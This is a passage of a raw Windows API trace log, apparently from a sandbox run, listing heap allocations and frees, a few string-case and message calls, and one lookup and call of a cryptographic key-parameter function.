(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0090.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0090.913] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0090.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0090.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.914] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0090.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.915] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0090.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0090.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.916] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0090.916] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0090.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0090.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0090.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0090.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0090.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0090.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0090.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0090.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0090.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0090.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0090.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0090.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0090.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0090.921] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0090.922] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2640, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2640*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.924] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.925] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.986] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 